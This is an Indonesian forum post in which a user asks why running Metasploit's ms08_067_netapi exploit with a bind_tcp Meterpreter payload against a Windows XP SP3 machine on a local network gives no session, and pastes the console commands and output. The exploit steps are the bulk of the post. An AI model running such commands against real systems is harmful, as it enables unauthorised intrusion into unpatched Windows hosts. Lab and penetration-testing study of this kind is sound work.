Sessi meterpreter tidak keluar
#1
permisi brother-brother, ane mau tanya nih soal metasploit ane,, ko sessi meterpreternya ga ke buka ya...?? padahal metasploitnya udah ane update ke versi 4.3

jadi seperti ini keluarnya


msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp

payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set rhost 192.168.0.1

rhost => 192.168.0.1

msf exploit(ms08_067_netapi) > set lhost 192.168.0.2

lhost => 192.168.0.2

msf exploit(ms08_067_netapi) > exploit


[*] Started bind handler

[*] Automatically detecting the target...

[*] Fingerprint: Windows XP - Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

msf exploit(ms08_067_netapi) >


nah sessi meterpreternya ga keluar ? apakah exploit gagal di execute?
kalo gagal kenapa tidak ada pesen error ? :badpc:


ket.
victim : Win xp sp3 2011


mohon bimbingannya..


Messages In This Thread
Sessi meterpreter tidak keluar - by Micro Code - 04-20-2012, 12:18 AM




Users browsing this thread: 1 Guest(s)